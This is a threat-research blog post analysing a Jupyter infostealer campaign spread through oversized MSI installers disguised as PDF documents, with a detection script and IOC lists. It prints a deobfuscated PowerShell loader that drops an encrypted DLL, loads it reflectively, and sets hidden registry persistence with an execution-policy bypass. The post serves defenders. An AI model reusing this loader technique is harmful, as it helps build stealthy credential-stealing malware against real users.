New Jupyter Evasive delivery via MSI installer


Introduction

In 2020, Morphisec introduced the Jupyter infostealer, a .NET attack that primarily targets Chromium, Firefox, and Chrome browser data while retaining the added capabilities of a backdoor.

Since then, Jupyter has remained active and highly evasive. It continues to receive very few to zero detections in the VirusTotal database, and so retains the ability to bypass detection-based solutions.

Then, on September 8, 2021, we identified a new delivery chain within Jupyter that is going under the radar of security solutions. Following this discovery, the Morphisec Labs team was made aware of several high-level targets threatened by the Jupyter infostealer. We are currently studying the scope of the campaign.

The following blog post describes the new distribution chain, showing how threat actors continue to scale up their attacks to become more effective and evasive.

Technical overview

Figure 1: The attack flow of the new Jupyter infostealer

MSI payload

In this section, we take a brief look at the attributes the payloads share, so that we know which indicators to expect. This is based on the four variants we have observed.

Payload size and name

Like previous Jupyter payloads, the MSI payloads are consistently larger than 100MB. Files of this size exceed the maximum-file-size limits that many inline AV and sandbox scanners enforce, so the payload is frequently passed through unscanned.

The payload naming convention is:

  • Potential document topics
  • Words are separated by a dash ‘-‘
  • Each word begins with a capital letter

Examples can be found in the IOC section under the title “MSI Payload Names”.

MSI third-party installation wizard

The payloads were generated with a trial version of Advanced Installer (version 18.6.1, build 2c9a75c6).

As described on its website, Advanced Installer is an "all-in-one" application packaging tool. It gives the threat actors an easy way to implement obscured script execution from inside an MSI.

The attribution can be found either in the properties of the file (OLE Compound) or in the properties table of the installer.

Figure 2: OLE Compound File Information

Figure 3: Properties table

Decoy installation executable

As shown in the figures above, all observed variants are described as Nitro Pro 13. Once the victim runs the MSI payload, it executes a legitimate Nitro Pro 13 installation binary as a decoy. Taken together with the variant file names, this suggests that the lure presents the payload as a PDF document.

Figure 4: Installing Nitro Pro 13

While all of the variants are described as Nitro, one of them actually contains SumatraPDF instead.

Figure 5: Installing Sumatra PDF

Digital signature

Two of the variants are signed with a (currently) valid certificate named ‘SP ZOO TACHOPARTS‘.

Figure 6: Tachoparts certificate

Based on the certificate data below, we assess that the threat actor either impersonated a legitimate company in Poland or stole the certificate from it.

Figure 7: Tachoparts commercial information from Google

Another variant was signed with a revoked certificate named 'OOO Sistema'.

Figure 8: OOO Sistema certificate

As with the previous certificate, this one also correlates to a legitimate business, and was likely obtained either by impersonating the company or by stealing the certificate from it.

Figure 9: Google OOO Sistema commercial information

PowerShell execution

The first suspicious indicator visible in dynamic analysis is the PowerShell command line spawned by msiexec.exe.

Command line (the user name segment of the paths is shown as <user>):

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass
-File 'C:\Users\<user>\AppData\Local\Temp\pssEA35.ps1'
-propFile 'C:\Users\<user>\AppData\Local\Temp\msiEA13.txt'
-scriptFile 'C:\Users\<user>\AppData\Local\Temp\scrEA14.ps1'
-scriptArgsFile 'C:\Users\<user>\AppData\Local\Temp\scrEA15.txt'
-propSep ':: '
-testPrefix '_testValue.'

Code block 1: PowerShell command line spawned by msiexec.exe

This command line is generated by an Advanced Installer feature that runs a PowerShell script as a CustomAction defined in the MSI. The pss*.ps1 file passed to -File is Advanced Installer's own stub (its hash is listed in the IOC section under "Advanced Installer PowerShell stub hash"); judging by its parameters, it hands the installer properties (-propFile, -propSep) and the arguments file (-scriptArgsFile) to the attacker-supplied script named in -scriptFile. Any MSI built with this feature, malicious or not, produces the same process tree, so the msiexec.exe to powershell.exe relationship on its own is a triage signal, and the content of the -scriptFile script is what must be examined.

The file names in the parameters differ between the variants but keep the same pattern: in 'scrEA14.ps1', for example, EA14 is four hexadecimal characters, and these four characters differ between payload variants. A three-letter prefix followed by four hex digits is consistent with the naming scheme of the Win32 GetTempFileName API, so the suffix should be treated as run-time noise: detection logic should match on the prefix and the hex pattern rather than on a specific value.

Figure 9: PowerShell loader integrated into CustomAction in AdvancedInstaller
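The process tree described above (msiexec.exe spawning powershell.exe with the stub's switches) is the natural hunting point, but it is also exactly what every benign Advanced Installer package produces. The following Python script is an added example, not Morphisec's code: it applies that triage logic to constructed process-creation events modelled on Sysmon Event ID 1 fields, returns a finding only when the Advanced Installer switches are all present, and records separately whether the script is staged in %TEMP% under the pssXXXX/scrXXXX naming and whether the execution policy is bypassed. The event dictionaries, the user name "alice" and the process IDs are assumptions made for the example.

```python
"""Triage heuristic for the msiexec.exe -> powershell.exe pattern produced by an
Advanced Installer PowerShell CustomAction (added example, not Morphisec's code).

Events are modelled on Sysmon Event ID 1 (process creation) fields; the sample
events at the bottom are constructed for this example.  Because the pssXXXX.ps1
stub is Advanced Installer's own code, a finding is a triage signal, not a
verdict: the content of the scrXXXX.ps1 file is what must be examined.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# GetTempFileName-style names of the staged files: 3-letter prefix + 4 hex digits.
TEMP_SCRIPT_RE = re.compile(r"\\temp\\(?:pss|scr)[0-9a-f]{4}\.ps1$", re.IGNORECASE)


@dataclass
class Finding:
    pid: int
    script_file: Optional[str]
    reasons: List[str] = field(default_factory=list)


def switch_value(cmdline: str, switch: str) -> Optional[str]:
    """Return the single-quoted value following `switch`, e.g. -scriptFile '...'."""
    m = re.search(re.escape(switch) + r"\s+'([^']*)'", cmdline, re.IGNORECASE)
    return m.group(1).strip() if m else None


def analyse_event(ev: dict) -> Optional[Finding]:
    image = ev["Image"].lower()
    parent = ev["ParentImage"].lower()
    cmd = ev["CommandLine"]
    lowered = cmd.lower()

    if not (image.endswith("\\powershell.exe") and parent.endswith("\\msiexec.exe")):
        return None
    # The three file switches are emitted together by the Advanced Installer stub.
    if not all(s in lowered for s in ("-propfile", "-scriptfile", "-scriptargsfile")):
        return None

    finding = Finding(ev["ProcessId"], switch_value(cmd, "-scriptFile"))
    finding.reasons.append("powershell.exe spawned by msiexec.exe with Advanced Installer CustomAction switches")
    if finding.script_file and TEMP_SCRIPT_RE.search(finding.script_file):
        finding.reasons.append("CustomAction script staged in %TEMP% under a GetTempFileName-style name")
    if re.search(r"-(?:executionpolicy|ep)\s+bypass", lowered):
        finding.reasons.append("execution policy bypassed")
    return finding


def analyse(events: List[dict]) -> List[Finding]:
    return [f for f in (analyse_event(e) for e in events) if f is not None]


TEMP = r"C:\Users\alice\AppData\Local\Temp"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events: one Jupyter-style launch, one ordinary admin script,
# one msiexec-spawned PowerShell that does not use the Advanced Installer stub.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": PS, "ParentImage": r"C:\Windows\SysWOW64\msiexec.exe",
     "CommandLine": (PS + " -NoProfile -NonInteractive -ExecutionPolicy Bypass"
                     f" -File '{TEMP}\\pssEA35.ps1' -propFile '{TEMP}\\msiEA13.txt'"
                     f" -scriptFile '{TEMP}\\scrEA14.ps1' -scriptArgsFile '{TEMP}\\scrEA15.txt'"
                     " -propSep ':: ' -testPrefix '_testValue.'")},
    {"ProcessId": 5316, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": PS + r" -File 'C:\Scripts\inventory.ps1'"},
    {"ProcessId": 6044, "Image": PS, "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": PS + ' -Command "Restart-Service Spooler"'},
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f.pid, f.script_file, *f.reasons, sep="\n  ")
```

Only the first sample event yields a finding, with all three reasons; the msiexec-spawned PowerShell without the stub's switches is deliberately ignored so that the rule does not fire on every installer that runs a one-off command.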

Jupyter PowerShell loader

The PowerShell file passed in the -scriptFile parameter shown in Code block 1 is the Jupyter PowerShell loader.

This loader is very similar to previous Jupyter loaders in that it remains highly evasive, with low to zero detections on VirusTotal, which is rare for a full PowerShell loader (loader code with an embedded payload).

Jupyter loaders are covered extensively in our blog and elsewhere, and the new variant shares the same code pattern. The following code block is a deobfuscated and annotated version of it:

$b64_enc_payload = 'redacted';

$random_path_str = 'jeiJBgXRTuVfsm';
$payload_directory_path = $ENV:APPDATA + '\Microsoft\' + $random_path_str;
$enc_payload_path = $payload_directory_path + '\' + $random_path_str + '.' + $random_path_str;
# Stage 1: drop the base64-decoded (still XOR-encrypted) payload to disk
[System.IO.File]::WriteAllBytes($enc_payload_path, [System.Convert]::FromBase64String($b64_enc_payload));

# Stage 2 is kept as a string so that it can be both written to the registry for persistence
# and executed immediately with IEX. Its content is shown in the comment block below.
$decode_and_execute_payload_script = '<embedded script, see the comment block below>';
<#
$xor_key = "redacted base64-looking key";
# Despite the variable name, these are the raw XOR-encrypted DLL bytes dropped above
$b64_enc_payload = [System.IO.File]::ReadAllBytes($enc_payload_path);
For ($i = 0; $i -lt $b64_enc_payload.Count;) {
    For ($y = 0; $y -lt $xor_key.Length; $y++) {
        $b64_enc_payload[$i] = $b64_enc_payload[$i] -bxor $xor_key[$y];
        $i++;
        if ($i -ge $b64_enc_payload.Count) {
            $y = $xor_key.Length   # leave the inner loop once the last byte is processed
        }
    }
};
# Reflective load of the decrypted .NET DLL; the 'interact' method is invoked afterwards (call elided in the original)
[System.Reflection.Assembly]::Load($b64_enc_payload);
#>

# Persistence: Create_Registry_Key is a helper of the loader (not shown); the registry paths are omitted in the original
Create_Registry_Key -reg_path () -execution_command ('Powershell -WindowStyle Hidden -ep Bypass -Command "' + $decode_and_execute_payload_script + '"');
Create_Registry_Key -reg_path () -execution_command $random_path_str.ToLower();

# Shortcut pointing at the dropped file; the shortcut file name under %APPDATA% is omitted in the original,
# $lnk_relative_path stands in for it here
$lnk_object = (New-Object -ComObject WScript.Shell).CreateShortcut($ENV:APPDATA + $lnk_relative_path);
$lnk_object.TargetPath = $payload_directory_path + '\' + $random_path_str;
$lnk_object.WindowStyle = 7;   # minimized
$lnk_object.Save();

IEX $decode_and_execute_payload_script;

Code block 2: Deobfuscated Jupyter PowerShell loader

Note that, like previous versions, this one also reflectively loads a .NET DLL whose execution starts in the Deimos class of the Mars namespace (Mars.Deimos).

.NET DLL payload

In our previous blog, we attributed the payloads to their internal version. The following table correlates each observed internal version and the earliest submission date of the MSI payload with its detections on VirusTotal.

Internal version of the Jupyter DLL    VirusTotal first submission    Detections
SP-9                                   September 08, 2021             1/57 malicious
SP-10                                  September 08, 2021             2/57 malicious
SP-11                                  September 10, 2021             0/57 malicious
SP-13                                  September 13, 2021             0/57 malicious

Although all of the .NET DLL payloads are obfuscated, the SP-10 variant still contains readable source-code strings. The following figure shows the payload's method and class names.

Figure: SP-10 payload method and class names

Conclusion

The evolution of the Jupyter infostealer / backdoor since we first identified it in 2020 proves the truth of the claim that threat actors are always innovating. The fact that this attack continues to have little or no detections on VirusTotal further indicates the ease with which threat actors evade detection-based solutions. It is clear that a new approach is needed for threat prevention, as it is likely that these evasive attacks will continue.

This is why Morphisec has designed its solutions to focus on deterministic prevention of evasive attacks rather than detection. Customers who run the Morphisec breach prevention platform on their endpoints, on-premise servers, and in the cloud are protected against evasive threats such as the Jupyter infostealer, regardless of the detection rate on VirusTotal.

IOCs

MSI payload hashes

bc7986f0c9f431b839a13a9a0dfa2711f86e9e9afbed9b9b456066602881ba71
1197067d50dd5dd5af12e715e2cc00c0ba1ff738173928bbcfbbad1ee0a52f21
8e06c31285911c936425921ccf9f20107160174acd602cc7f2dd8ca677e8956d
9e3b4e4948521467216515e92812e5a47fb23f5bcb3a8b1a6014ae2f038c7181

Advanced Installer PowerShell stub hash

88748aae11029228d84aef0855f4bc084dfd70450db1f7029746d8bc85182f93

Jupyter PowerShell Loader Hashes

e34af1b6edf33b155ca9854d084577c30e1bc9d96eee10014277a0e55a47beef

f6aa48bc45be3b603a48a5261a28cc75e9c1c2f65aa37bb807b6c1bd80dce05a

8bd8fa4a5500d390d69941cb5d89a568d46d49bc4ac731a6c548b7d8e69625c2

Jupyter payloads

1f034e91613ab7c290d172b87200a000365728f218cbd4491f59d09a20bfd866

8c35f2a78e366abf2450d5882c49c69ee5cc01dba3743938b45cedc2b5dee3a3

1c5082cb7fbd011feb14909320b163b038febed29700568f9a2c7b5a416fad51
2524cea17b8ec62d30a93751fc42cc4e33350caaff5ba9a2327c048b715b2d4a

C2 IPs

37.120.237[.]251

45.42.201[.]248

MSI payload names

Metlife-Disability-Waiver-Of-Premium-Benefit-Rider.msi
Medical-Engagement-Scale-Questionnaire.msi
Due-Diligence-Checklist-For-Oil-And-Gas-Properties.msi
Lease-non-renewal-letter-to-tenant-landlord.msi
Fedex-Tracking-By-Shipper-Receipt.msi
Christian-Doctrine-Clauses-List.msi
Omnicell-Cabinet-User-Manual.msi
app.msi
